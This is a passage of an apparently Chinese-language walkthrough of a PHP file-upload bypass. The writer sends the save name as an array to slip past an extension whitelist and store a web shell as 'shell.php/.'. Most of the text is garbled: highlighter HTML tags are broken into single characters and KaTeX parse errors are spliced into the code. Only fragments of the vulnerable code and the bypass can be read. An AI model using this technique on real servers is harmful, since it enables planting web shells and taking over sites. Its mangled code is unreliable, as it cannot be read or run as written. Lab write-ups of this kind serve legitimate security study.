            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            [
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             ′
            
           
           
            u
           
           
            p
           
           
            l
           
           
            o
           
           
            a
           
           
            
             d
            
            
             f
            
           
           
            i
           
           
            l
           
           
            
             e
            
            
             ′
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ]
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            [
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             ′
            
           
           
            n
           
           
            a
           
           
            m
           
           
            
             e
            
            
             ′
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ]
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            :
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           _FILES</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'upload_file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span> <span class="token punctuation">:</span> <span class="token variable">
          
         
        FILES</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">uploadfile</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">name</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">:</span><spanclass="tokenvariable">_POST[‘save_name’];

if (!is_array(KaTeX parse error: Expected '}', got 'EOF' at end of input: …oken variable">file = explode(’.’, strtolower(KaTeX parse error: Expected 'EOF', got '}' at position 165: …n punctuation">}̲</span><span ar…ext = end( f i l e < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > file</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable"> file</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">allow_suffix = array(‘jpg’,‘png’,‘gif’);

if (!in_array( e x t < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > ext</span><span class="token punctuation">,</span> <span class="token variable"> ext</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">allow_suffix)) {
echo “<script>black();</script>”;
}

如果不是合法后缀的话直接就报错了,所以我们老老实实的传入合法的字符串类型的不行的,这里的传入一个数组。比如这样的数组:

php
KaTeX parse error: Expected 'EOF', got '&' at position 156: …ken operator">=&̲gt;</span><span…file_name = reset(
        
         
          
           
            f
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            )
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            .
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             ′
            
           
           
            
             .
            
            
             ′
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            .
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           file</span><span class="token punctuation">)</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'.'</span> <span class="token operator">.</span> <span class="token variable">
          
         
        file</span><spanclass="tokenpunctuation">)</span><spanclass="tokenoperator">.</span><spanclass="tokenstringsinglequotedstring">.</span><spanclass="tokenoperator">.</span><spanclass="tokenvariable">file[count(
        
         
          
           
            f
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            )
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            −
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            n
           
           
            u
           
           
            m
           
           
            b
           
           
            e
           
           
            r
           
           
            "
           
           
            >
           
           
            1
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ]
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ;
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           file</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token variable">
          
         
        file</span><spanclass="tokenpunctuation">)</span><spanclass="tokenoperator"></span><spanclass="tokennumber">1</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">file_name = ‘shell.php/’ . ‘.’ . 
        
         
          
           
            f
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            [
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            n
           
           
            u
           
           
            m
           
           
            b
           
           
            e
           
           
            r
           
           
            "
           
           
            >
           
           
            2
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            −
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            n
           
           
            u
           
           
            m
           
           
            b
           
           
            e
           
           
            r
           
           
            "
           
           
            >
           
           
            1
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ]
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ;
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            =
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             ′
            
           
           
            s
           
           
            h
           
           
            e
           
           
            l
           
           
            l
           
           
            .
           
           
            p
           
           
            h
           
           
            p
           
           
            
             /
            
            
             ′
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            .
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             
              ′
             
             
              ′
             
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            =
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            s
           
           
            i
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            q
           
           
            u
           
           
            o
           
           
            t
           
           
            e
           
           
            d
           
           
            −
           
           
            s
           
           
            t
           
           
            r
           
           
            i
           
           
            n
           
           
            g
           
           
            "
           
           
            
             >
            
            
             ′
            
           
           
            s
           
           
            h
           
           
            e
           
           
            l
           
           
            l
           
           
            .
           
           
            p
           
           
            h
           
           
            p
           
           
            /
           
           
            
             .
            
            
             ′
            
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            −
           
           
            h
           
           
            i
           
           
            d
           
           
            d
           
           
            e
           
           
            n
           
           
            =
           
           
            "
           
           
            t
           
           
            r
           
           
            u
           
           
            e
           
           
            "
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            l
           
           
            i
           
           
            n
           
           
            e
           
           
            −
           
           
            n
           
           
            u
           
           
            m
           
           
            b
           
           
            e
           
           
            r
           
           
            s
           
           
            −
           
           
            r
           
           
            o
           
           
            w
           
           
            s
           
           
            "
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            /
           
           
            c
           
           
            o
           
           
            d
           
           
            e
           
           
            >
           
           
            <
           
           
            /
           
           
            p
           
           
            r
           
           
            e
           
           
            >
           
           
            <
           
           
            /
           
           
            d
           
           
            i
           
           
            v
           
           
            >
           
           
            <
           
           
            p
           
           
            >
           
           
            这
           
           
            样
           
           
            最
           
           
            后
           
           
            一
           
           
            步
           
           
            :
           
           
            <
           
           
            /
           
           
            p
           
           
            >
           
           
            <
           
           
            d
           
           
            i
           
           
            v
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            c
           
           
            o
           
           
            d
           
           
            e
           
           
            −
           
           
            a
           
           
            r
           
           
            e
           
           
            a
           
           
            "
           
           
            s
           
           
            t
           
           
            y
           
           
            l
           
           
            e
           
           
            =
           
           
            "
           
           
            p
           
           
            o
           
           
            s
           
           
            i
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            :
           
           
            r
           
           
            e
           
           
            l
           
           
            a
           
           
            t
           
           
            i
           
           
            v
           
           
            e
           
           
            "
           
           
            >
           
           
            <
           
           
            i
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            f
           
           
            a
           
           
            s
           
           
            f
           
           
            a
           
           
            −
           
           
            a
           
           
            n
           
           
            g
           
           
            l
           
           
            e
           
           
            −
           
           
            u
           
           
            p
           
           
            c
           
           
            o
           
           
            d
           
           
            e
           
           
            −
           
           
            e
           
           
            x
           
           
            p
           
           
            a
           
           
            n
           
           
            d
           
           
            "
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            −
           
           
            h
           
           
            i
           
           
            d
           
           
            d
           
           
            e
           
           
            n
           
           
            =
           
           
            "
           
           
            t
           
           
            r
           
           
            u
           
           
            e
           
           
            "
           
           
            >
           
           
            <
           
           
            /
           
           
            i
           
           
            >
           
           
            <
           
           
            d
           
           
            i
           
           
            v
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            c
           
           
            o
           
           
            d
           
           
            e
           
           
            c
           
           
            o
           
           
            p
           
           
            
             y
            
            
             n
            
           
           
            o
           
           
            t
           
           
            i
           
           
            c
           
           
            e
           
           
            "
           
           
            >
           
           
            <
           
           
            /
           
           
            d
           
           
            i
           
           
            v
           
           
            >
           
           
            <
           
           
            i
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            f
           
           
            a
           
           
            s
           
           
            f
           
           
            a
           
           
            −
           
           
            c
           
           
            o
           
           
            p
           
           
            y
           
           
            c
           
           
            o
           
           
            d
           
           
            
             e
            
            
             c
            
           
           
            o
           
           
            p
           
           
            y
           
           
            "
           
           
            t
           
           
            i
           
           
            t
           
           
            l
           
           
            e
           
           
            =
           
           
            "
           
           
            复
           
           
            制
           
           
            代
           
           
            码
           
           
            "
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            −
           
           
            h
           
           
            i
           
           
            d
           
           
            d
           
           
            e
           
           
            n
           
           
            =
           
           
            "
           
           
            t
           
           
            r
           
           
            u
           
           
            e
           
           
            "
           
           
            >
           
           
            <
           
           
            /
           
           
            i
           
           
            >
           
           
            <
           
           
            d
           
           
            i
           
           
            v
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            c
           
           
            o
           
           
            d
           
           
            
             e
            
            
             l
            
           
           
            a
           
           
            n
           
           
            g
           
           
            "
           
           
            t
           
           
            i
           
           
            t
           
           
            l
           
           
            e
           
           
            =
           
           
            "
           
           
            代
           
           
            码
           
           
            语
           
           
            言
           
           
            "
           
           
            >
           
           
            p
           
           
            h
           
           
            p
           
           
            <
           
           
            /
           
           
            d
           
           
            i
           
           
            v
           
           
            >
           
           
            <
           
           
            p
           
           
            r
           
           
            e
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            l
           
           
            i
           
           
            n
           
           
            e
           
           
            −
           
           
            n
           
           
            u
           
           
            m
           
           
            b
           
           
            e
           
           
            r
           
           
            s
           
           
            l
           
           
            a
           
           
            n
           
           
            g
           
           
            u
           
           
            a
           
           
            g
           
           
            e
           
           
            −
           
           
            p
           
           
            h
           
           
            p
           
           
            "
           
           
            d
           
           
            a
           
           
            t
           
           
            a
           
           
            −
           
           
            l
           
           
            a
           
           
            n
           
           
            g
           
           
            u
           
           
            a
           
           
            g
           
           
            e
           
           
            =
           
           
            "
           
           
            p
           
           
            h
           
           
            p
           
           
            "
           
           
            >
           
           
            <
           
           
            c
           
           
            o
           
           
            d
           
           
            e
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            l
           
           
            a
           
           
            n
           
           
            g
           
           
            u
           
           
            a
           
           
            g
           
           
            e
           
           
            −
           
           
            p
           
           
            h
           
           
            p
           
           
            "
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            f
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            m
           
           
            o
           
           
            v
           
           
            
             e
            
            
             u
            
           
           
            p
           
           
            l
           
           
            o
           
           
            a
           
           
            d
           
           
            e
           
           
            
             d
            
            
             f
            
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            (
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           file</span><span class="token punctuation">[</span><span class="token number">2</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'shell.php/'</span><span class="token operator">.</span><span class="token string single-quoted-string">''</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'shell.php/.'</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></div><p>这样最后一步:</p><div class="code-area" style="position: relative"><i class="fas fa-angle-up code-expand" aria-hidden="true"></i><div class="codecopy_notice"></div><i class="fas fa-copy code_copy" title="复制代码" aria-hidden="true"></i><div class="code_lang" title="代码语言">php</div><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token function">move_uploaded_file</span><span class="token punctuation">(</span><span class="token variable">
          
         
